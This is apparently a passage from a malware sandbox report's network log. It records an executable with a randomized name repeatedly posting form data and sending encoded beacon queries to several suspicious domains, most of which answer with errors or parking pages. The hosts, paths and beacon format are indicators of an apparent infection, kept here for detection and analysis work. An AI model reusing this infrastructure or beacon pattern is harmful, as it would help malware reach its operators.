                                                                                                        Data Ascii: aNXP_jw=9MVRUBQD0iJJgSxv2+ILl3ER8OXDOpKjXrTaXPftatPdd50okl225rtNrlwwxb3orwMKx4a0inMKEODxj7SJ/d38G+L02SE2NLSQpiPB8zY4NvuVondHfmLyhhB1aMm1Hv98/1GnwYdazaDIIFcmnubQb8PvhhqstUyKFNTPS2y4avCWu31/3AZ3dW0VWjmoQyg7Ic+3aZVT


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.6 | 49831 | 3.33.130.190 | 80 | 2488 | C:\Program Files (x86)\YZdbVpHrzDdbUaBfnvsINfTzKzGQOMiAjZaAhLHBOnPRvoWKTcNENgdobPWXGrC\LfvKCNKdvt.exe
Timestamp | Bytes transferred | Direction | Data
Dec 2, 2024 14:37:41.976974010 CET | 846 | OUT | POST /08fk/ HTTP/1.1
                                                                                                        Host: www.swenansiansie.xyz
                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                        Origin: http://www.swenansiansie.xyz
                                                                                                        Referer: http://www.swenansiansie.xyz/08fk/
                                                                                                        Content-Length: 236
                                                                                                        Connection: close
                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                        Cache-Control: max-age=0
                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/8.0; Touch; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; Tablet PC 2.0; MALNJS)


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.6 | 49837 | 3.33.130.190 | 80 | 2488 | C:\Program Files (x86)\YZdbVpHrzDdbUaBfnvsINfTzKzGQOMiAjZaAhLHBOnPRvoWKTcNENgdobPWXGrC\LfvKCNKdvt.exe
Timestamp | Bytes transferred | Direction | Data
Dec 2, 2024 14:37:44.639585018 CET | 1859 | OUT | POST /08fk/ HTTP/1.1
                                                                                                        Host: www.swenansiansie.xyz
                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                        Origin: http://www.swenansiansie.xyz
                                                                                                        Referer: http://www.swenansiansie.xyz/08fk/
                                                                                                        Content-Length: 1248
                                                                                                        Connection: close
                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                        Cache-Control: max-age=0
                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/8.0; Touch; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; Tablet PC 2.0; MALNJS)


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
4 | 192.168.2.6 | 49843 | 3.33.130.190 | 80 | 2488 | C:\Program Files (x86)\YZdbVpHrzDdbUaBfnvsINfTzKzGQOMiAjZaAhLHBOnPRvoWKTcNENgdobPWXGrC\LfvKCNKdvt.exe
Timestamp | Bytes transferred | Direction | Data
Dec 2, 2024 14:37:47.302540064 CET | 554 | OUT | GET /08fk/?aNXP_jw=wO9xX0AKySxfvwdHh4QTlRV0r5byLZyAFqW9fcrcStHhFZoMkGqz6sQIsykFtZP4y0c8jJ2OtnUnMO7zvO6a787TBpev3CA9JKuvjWbz5jcDVeWMoitqZ3m3uhcYDsapTcVm+CQ=&cTT8u=Q4NHoHJ0 HTTP/1.1
                                                                                                        Host: www.swenansiansie.xyz
                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                        Connection: close
                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/8.0; Touch; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; Tablet PC 2.0; MALNJS)
Dec 2, 2024 14:37:48.437875032 CET | 414 | IN | HTTP/1.1 200 OK
                                                                                                        Server: openresty
                                                                                                        Date: Mon, 02 Dec 2024 13:37:48 GMT
                                                                                                        Content-Type: text/html
                                                                                                        Content-Length: 274
                                                                                                        Connection: close
                                                                                                        Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?aNXP_jw=wO9xX0AKySxfvwdHh4QTlRV0r5byLZyAFqW9fcrcStHhFZoMkGqz6sQIsykFtZP4y0c8jJ2OtnUnMO7zvO6a787TBpev3CA9JKuvjWbz5jcDVeWMoitqZ3m3uhcYDsapTcVm+CQ=&cTT8u=Q4NHoHJ0"}</script></head></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
5 | 192.168.2.6 | 49878 | 5.39.10.93 | 80 | 2488 | C:\Program Files (x86)\YZdbVpHrzDdbUaBfnvsINfTzKzGQOMiAjZaAhLHBOnPRvoWKTcNENgdobPWXGrC\LfvKCNKdvt.exe
Timestamp | Bytes transferred | Direction | Data
Dec 2, 2024 14:38:02.538472891 CET | 813 | OUT | POST /v70f/ HTTP/1.1
                                                                                                        Host: www.spectre.center
                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                        Origin: http://www.spectre.center
                                                                                                        Referer: http://www.spectre.center/v70f/
                                                                                                        Content-Length: 212
                                                                                                        Connection: close
                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                        Cache-Control: max-age=0
                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/8.0; Touch; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; Tablet PC 2.0; MALNJS)
Dec 2, 2024 14:38:03.860548973 CET | 354 | IN | HTTP/1.1 403 Forbidden
                                                                                                        Server: nginx
                                                                                                        Date: Mon, 02 Dec 2024 13:38:03 GMT
                                                                                                        Content-Type: text/html
                                                                                                        Transfer-Encoding: chunked
                                                                                                        Connection: close
                                                                                                        Content-Encoding: gzip


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
6 | 192.168.2.6 | 49885 | 5.39.10.93 | 80 | 2488 | C:\Program Files (x86)\YZdbVpHrzDdbUaBfnvsINfTzKzGQOMiAjZaAhLHBOnPRvoWKTcNENgdobPWXGrC\LfvKCNKdvt.exe
Timestamp | Bytes transferred | Direction | Data
Dec 2, 2024 14:38:05.197454929 CET | 837 | OUT | POST /v70f/ HTTP/1.1
                                                                                                        Host: www.spectre.center
                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                        Origin: http://www.spectre.center
                                                                                                        Referer: http://www.spectre.center/v70f/
                                                                                                        Content-Length: 236
                                                                                                        Connection: close
                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                        Cache-Control: max-age=0
                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/8.0; Touch; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; Tablet PC 2.0; MALNJS)
Dec 2, 2024 14:38:06.522099018 CET | 354 | IN | HTTP/1.1 403 Forbidden
                                                                                                        Server: nginx
                                                                                                        Date: Mon, 02 Dec 2024 13:38:06 GMT
                                                                                                        Content-Type: text/html
                                                                                                        Transfer-Encoding: chunked
                                                                                                        Connection: close
                                                                                                        Content-Encoding: gzip


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
7 | 192.168.2.6 | 49890 | 5.39.10.93 | 80 | 2488 | C:\Program Files (x86)\YZdbVpHrzDdbUaBfnvsINfTzKzGQOMiAjZaAhLHBOnPRvoWKTcNENgdobPWXGrC\LfvKCNKdvt.exe
Timestamp | Bytes transferred | Direction | Data
Dec 2, 2024 14:38:07.869075060 CET | 1850 | OUT | POST /v70f/ HTTP/1.1
                                                                                                        Host: www.spectre.center
                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                        Origin: http://www.spectre.center
                                                                                                        Referer: http://www.spectre.center/v70f/
                                                                                                        Content-Length: 1248
                                                                                                        Connection: close
                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                        Cache-Control: max-age=0
                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/8.0; Touch; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; Tablet PC 2.0; MALNJS)
Dec 2, 2024 14:38:09.194322109 CET | 354 | IN | HTTP/1.1 403 Forbidden
                                                                                                        Server: nginx
                                                                                                        Date: Mon, 02 Dec 2024 13:38:08 GMT
                                                                                                        Content-Type: text/html
                                                                                                        Transfer-Encoding: chunked
                                                                                                        Connection: close
                                                                                                        Content-Encoding: gzip


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
8 | 192.168.2.6 | 49895 | 5.39.10.93 | 80 | 2488 | C:\Program Files (x86)\YZdbVpHrzDdbUaBfnvsINfTzKzGQOMiAjZaAhLHBOnPRvoWKTcNENgdobPWXGrC\LfvKCNKdvt.exe
Timestamp | Bytes transferred | Direction | Data
Dec 2, 2024 14:38:10.534256935 CET | 551 | OUT | GET /v70f/?aNXP_jw=BBAjdqWYBB/MRyq00dIcezl7OvIx5dSebduL9p4zICzjFNfvyshgEJ0+kFvLW81K0aQqDuxS3lz73s8YF+5idFlByfp0+7vcrnzlNMGRBRFmOTNFNBZSGoPe8m8L5uZEU1B7gQA=&cTT8u=Q4NHoHJ0 HTTP/1.1
                                                                                                        Host: www.spectre.center
                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                        Connection: close
                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/8.0; Touch; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; Tablet PC 2.0; MALNJS)
Dec 2, 2024 14:38:11.840359926 CET | 1236 | IN | HTTP/1.1 200 OK
                                                                                                        Server: nginx
                                                                                                        Date: Mon, 02 Dec 2024 13:38:11 GMT
                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                        Transfer-Encoding: chunked
                                                                                                        Connection: close
                                                                                                        Dec 2, 2024 14:38:11.840444088 CET1236INData Raw: 20 20 20 20 20 3c 2f 6c 69 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                        Data Ascii: </li> <li> <a href="https://www.imena.ua/domains/premium-domains" title=" "> </a>
                                                                                                        Dec 2, 2024 14:38:11.840455055 CET776INData Raw: 68 74 74 70 73 3a 2f 2f 77 77 77 2e 69 6d 65 6e 61 2e 75 61 2f 68 65 6c 70 22 3e d0 94 d0 be d0 bf d0 be d0 bc d0 be d0 b3 d0 b0 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 6c 69 3e 0a 20 20 20 20
                                                                                                        Data Ascii: https://www.imena.ua/help"></a> </li> <li> <a href="https://www.imena.ua/contact"></a> </li>
                                                                                                        Dec 2, 2024 14:38:11.840471983 CET1236INData Raw: 23 22 20 63 6c 61 73 73 3d 22 65 6e 74 65 72 5f 62 74 6e 22 3e d0 92 d1 85 d1 96 d0 b4 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 65 6e 74 65 72 5f 62 6c 6f 63 6b 20 68 69 64 64
                                                                                                        Data Ascii: #" class="enter_btn"></a> <div class="enter_block hidden"> <ol class="enter_block_black"> <li><a href="https://control.imena.ua/login.php?lang=2" rel="nofollow"><s
                                                                                                        Dec 2, 2024 14:38:11.840642929 CET1236INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 6c 61 6e 67 5f 6c 69 73 74 20 68 69 64 64 65 6e 22 3e 0a 20 20 20 20 20 20 20 20
                                                                                                        Data Ascii: </div> <div class="lang_list hidden"> <div class="lang_list_container"> <div> <div class="radio left ">
                                                                                                        Dec 2, 2024 14:38:11.840657949 CET1236INData Raw: 75 74 20 74 79 70 65 3d 22 72 61 64 69 6f 22 20 6e 61 6d 65 3d 22 68 5f 74 65 72 6d 22 20 76 61 6c 75 65 3d 22 31 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c
                                                                                                        Data Ascii: ut type="radio" name="h_term" value="1"> <a href="https://www.imena.ua/ru" class="lang_ru"></a> </label> </div>
                                                                                                        Dec 2, 2024 14:38:11.960932016 CET1236INData Raw: 76 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 64 6f 6d 61 69 6e 5f 73 65 61 72 63
                                                                                                        Data Ascii: v> </div> <div class="domain_search_bg_c"></div> <div class="domain_search_bg_triangle_l"></div> <div class="domain_search_bg_triangle_r"></div>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
9 | 192.168.2.6 | 49912 | 194.58.112.174 | 80 | 2488 | C:\Program Files (x86)\YZdbVpHrzDdbUaBfnvsINfTzKzGQOMiAjZaAhLHBOnPRvoWKTcNENgdobPWXGrC\LfvKCNKdvt.exe
Timestamp | Bytes transferred | Direction | Data
Dec 2, 2024 14:38:18.647104025 CET | 795 | OUT | POST /6sgf/ HTTP/1.1
                                                                                                        Host: www.synd.fun
                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                        Origin: http://www.synd.fun
                                                                                                        Referer: http://www.synd.fun/6sgf/
                                                                                                        Content-Length: 212
                                                                                                        Connection: close
                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                        Cache-Control: max-age=0
                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/8.0; Touch; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; Tablet PC 2.0; MALNJS)
Dec 2, 2024 14:38:20.003469944 CET | 1236 | IN | HTTP/1.1 404 Not Found
                                                                                                        Server: nginx
                                                                                                        Date: Mon, 02 Dec 2024 13:38:19 GMT
                                                                                                        Content-Type: text/html
                                                                                                        Transfer-Encoding: chunked
                                                                                                        Connection: close
                                                                                                        Content-Encoding: gzip


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
10 | 192.168.2.6 | 49919 | 194.58.112.174 | 80 | 2488 | C:\Program Files (x86)\YZdbVpHrzDdbUaBfnvsINfTzKzGQOMiAjZaAhLHBOnPRvoWKTcNENgdobPWXGrC\LfvKCNKdvt.exe
Timestamp | Bytes transferred | Direction | Data
Dec 2, 2024 14:38:21.340894938 CET | 819 | OUT | POST /6sgf/ HTTP/1.1
                                                                                                        Host: www.synd.fun
                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                        Origin: http://www.synd.fun
                                                                                                        Referer: http://www.synd.fun/6sgf/
                                                                                                        Content-Length: 236
                                                                                                        Connection: close
                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                        Cache-Control: max-age=0
                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/8.0; Touch; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; Tablet PC 2.0; MALNJS)
Dec 2, 2024 14:38:22.741286993 CET | 1236 | IN | HTTP/1.1 404 Not Found
                                                                                                        Server: nginx
                                                                                                        Date: Mon, 02 Dec 2024 13:38:22 GMT
                                                                                                        Content-Type: text/html
                                                                                                        Transfer-Encoding: chunked
                                                                                                        Connection: close
                                                                                                        Content-Encoding: gzip


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
11 | 192.168.2.6 | 49925 | 194.58.112.174 | 80 | 2488 | C:\Program Files (x86)\YZdbVpHrzDdbUaBfnvsINfTzKzGQOMiAjZaAhLHBOnPRvoWKTcNENgdobPWXGrC\LfvKCNKdvt.exe
Timestamp | Bytes transferred | Direction | Data
Dec 2, 2024 14:38:24.011362076 CET | 1832 | OUT | POST /6sgf/ HTTP/1.1
                                                                                                        Host: www.synd.fun
                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                        Origin: http://www.synd.fun
                                                                                                        Referer: http://www.synd.fun/6sgf/
                                                                                                        Content-Length: 1248
                                                                                                        Connection: close
                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                        Cache-Control: max-age=0
                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/8.0; Touch; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; Tablet PC 2.0; MALNJS)
Dec 2, 2024 14:38:25.323488951 CET | 1236 | IN | HTTP/1.1 404 Not Found
                                                                                                        Server: nginx
                                                                                                        Date: Mon, 02 Dec 2024 13:38:25 GMT
                                                                                                        Content-Type: text/html
                                                                                                        Transfer-Encoding: chunked
                                                                                                        Connection: close
                                                                                                        Content-Encoding: gzip


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
12 | 192.168.2.6 | 49932 | 194.58.112.174 | 80 | 2488 | C:\Program Files (x86)\YZdbVpHrzDdbUaBfnvsINfTzKzGQOMiAjZaAhLHBOnPRvoWKTcNENgdobPWXGrC\LfvKCNKdvt.exe
Timestamp | Bytes transferred | Direction | Data
Dec 2, 2024 14:38:26.676837921 CET | 545 | OUT | GET /6sgf/?aNXP_jw=6iGJK9crk1nRcZ4JnjW5XFV8mHNB14071bVcqkX9tU6kQKoAsGb7iBX66eKgx6XFHSItuyLYYeRhUgDlnjjXRZ3rjMrHC/Gv/9ocmuyHMrUIRIkrN1ClkKvdCmOBXovMxeC3un8=&cTT8u=Q4NHoHJ0 HTTP/1.1
                                                                                                        Host: www.synd.fun
                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                        Connection: close
                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/8.0; Touch; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; Tablet PC 2.0; MALNJS)
Dec 2, 2024 14:38:28.045411110 CET | 1236 | IN | HTTP/1.1 404 Not Found
                                                                                                        Server: nginx
                                                                                                        Date: Mon, 02 Dec 2024 13:38:27 GMT
                                                                                                        Content-Type: text/html
                                                                                                        Transfer-Encoding: chunked
                                                                                                        Connection: close
                                                                                                        Dec 2, 2024 14:38:28.045535088 CET1236INData Raw: 6f 75 72 63 65 3d 77 77 77 2e 73 79 6e 64 2e 66 75 6e 26 75 74 6d 5f 6d 65 64 69 75 6d 3d 70 61 72 6b 69 6e 67 26 75 74 6d 5f 63 61 6d 70 61 69 67 6e 3d 73 5f 6c 61 6e 64 5f 68 6f 73 74 26 61 6d 70 3b 72 65 67 5f 73 6f 75 72 63 65 3d 70 61 72 6b
                                                                                                        Data Ascii: ource=www.synd.fun&utm_medium=parking&utm_campaign=s_land_host&amp;reg_source=parking_auto"> </a><p class="b-price b-parking__price"> <b class="b-price__amount">83&nbsp;<span class="char-rouble-native">&#8381;</
                                                                                                        Dec 2, 2024 14:38:28.045542002 CET1236INData Raw: 73 3d 22 62 2d 74 65 78 74 20 62 2d 70 61 72 6b 69 6e 67 5f 5f 70 72 6f 6d 6f 2d 64 65 73 63 72 69 70 74 69 6f 6e 22 3e d0 93 d0 be d1 82 d0 be d0 b2 d1 8b d0 b5 20 d1 88 d0 b0 d0 b1 d0 bb d0 be d0 bd d1 8b 20 d1 81 26 6e 62 73 70 3b d0 be d1 82
                                                                                                        Data Ascii: s="b-text b-parking__promo-description"> &nbsp; &nbsp; </p><a class="b-button b-button_color_reference b-button_style_block b-button_size_m
                                                                                                        Dec 2, 2024 14:38:28.045548916 CET1236INData Raw: b5 d1 80 d1 82 d0 b8 d1 84 d0 b8 d0 ba d0 b0 d1 82 20 d0 b8 26 6e 62 73 70 3b d0 be d0 b1 d0 b5 d0 b7 d0 be d0 bf d0 b0 d1 81 d1 8c d1 82 d0 b5 20 d0 b2 d0 b0 d1 88 20 d0 bf d1 80 d0 be d0 b5 d0 ba d1 82 20 d0 be d1 82 26 6e 62 73 70 3b d0 b7 d0
                                                                                                        Data Ascii: &nbsp; &nbsp;! , &nbsp; &nbsp;
                                                                                                        Dec 2, 2024 14:38:28.045686007 CET1236INData Raw: 3d 20 30 20 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6c 69 6e 6b 73 5b 20 69 20 5d 2e 68 72 65 66 20 3d 20 6c 69 6e 6b 73 5b 20 69 20 5d 2e 68 72 65 66 20 2b 20 27 26 27 3b 0a 20 20 20 20 20 20 20 20 20
                                                                                                        Data Ascii: = 0 ) { links[ i ].href = links[ i ].href + '&'; } else { links[ i ].href = links[ i ].href + '?'; } links[ i ].href = links[ i ].href
                                                                                                        Dec 2, 2024 14:38:28.045696974 CET1097INData Raw: 65 2e 6d 61 74 63 68 28 20 2f 5e 70 75 6e 79 2f 20 29 20 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 76 61 72 20 74 65 78 74 20 3d 20 73 70 61 6e 73 5b 20 69 20 5d 5b 20 74 20 5d 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                        Data Ascii: e.match( /^puny/ ) ) { var text = spans[ i ][ t ]; text = punycode.ToUnicode( text ); spans[ i ][ t ] = text; } else if ( spans[ i ].className.match( /^no-puny/ ) ) {


                                                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                        13 | 192.168.2.6 | 49948 | 209.74.64.187 | 80 | 2488 | C:\Program Files (x86)\YZdbVpHrzDdbUaBfnvsINfTzKzGQOMiAjZaAhLHBOnPRvoWKTcNENgdobPWXGrC\LfvKCNKdvt.exe
                                                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                                                        Dec 2, 2024 14:38:33.610939026 CET | 807 | OUT | POST /ohf8/ HTTP/1.1
                                                                                                        Host: www.jagdud.store
                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                        Origin: http://www.jagdud.store
                                                                                                        Referer: http://www.jagdud.store/ohf8/
                                                                                                        Content-Length: 212
                                                                                                        Connection: close
                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                        Cache-Control: max-age=0
                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/8.0; Touch; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; Tablet PC 2.0; MALNJS)
                                                                                                        Dec 2, 2024 14:38:34.909288883 CET | 533 | IN | HTTP/1.1 404 Not Found
                                                                                                        Date: Mon, 02 Dec 2024 13:38:34 GMT
                                                                                                        Server: Apache
                                                                                                        Content-Length: 389
                                                                                                        Connection: close
                                                                                                        Content-Type: text/html
                                                                                                        Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                        14 | 192.168.2.6 | 49956 | 209.74.64.187 | 80 | 2488 | C:\Program Files (x86)\YZdbVpHrzDdbUaBfnvsINfTzKzGQOMiAjZaAhLHBOnPRvoWKTcNENgdobPWXGrC\LfvKCNKdvt.exe
                                                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                                                        Dec 2, 2024 14:38:36.276108027 CET | 831 | OUT | POST /ohf8/ HTTP/1.1
                                                                                                        Host: www.jagdud.store
                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                        Origin: http://www.jagdud.store
                                                                                                        Referer: http://www.jagdud.store/ohf8/
                                                                                                        Content-Length: 236
                                                                                                        Connection: close
                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                        Cache-Control: max-age=0
                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/8.0; Touch; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; Tablet PC 2.0; MALNJS)
                                                                                                        Dec 2, 2024 14:38:37.534991980 CET | 533 | IN | HTTP/1.1 404 Not Found
                                                                                                        Date: Mon, 02 Dec 2024 13:38:37 GMT
                                                                                                        Server: Apache
                                                                                                        Content-Length: 389
                                                                                                        Connection: close
                                                                                                        Content-Type: text/html
                                                                                                        Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                        15 | 192.168.2.6 | 49962 | 209.74.64.187 | 80 | 2488 | C:\Program Files (x86)\YZdbVpHrzDdbUaBfnvsINfTzKzGQOMiAjZaAhLHBOnPRvoWKTcNENgdobPWXGrC\LfvKCNKdvt.exe
                                                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                                                        Dec 2, 2024 14:38:38.949639082 CET | 1844 | OUT | POST /ohf8/ HTTP/1.1
                                                                                                        Host: www.jagdud.store
                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                        Origin: http://www.jagdud.store
                                                                                                        Referer: http://www.jagdud.store/ohf8/
                                                                                                        Content-Length: 1248
                                                                                                        Connection: close
                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                        Cache-Control: max-age=0
                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/8.0; Touch; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; Tablet PC 2.0; MALNJS)
                                                                                                        Dec 2, 2024 14:38:40.199031115 CET | 533 | IN | HTTP/1.1 404 Not Found
                                                                                                        Date: Mon, 02 Dec 2024 13:38:39 GMT
                                                                                                        Server: Apache
                                                                                                        Content-Length: 389
                                                                                                        Connection: close
                                                                                                        Content-Type: text/html
                                                                                                        Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
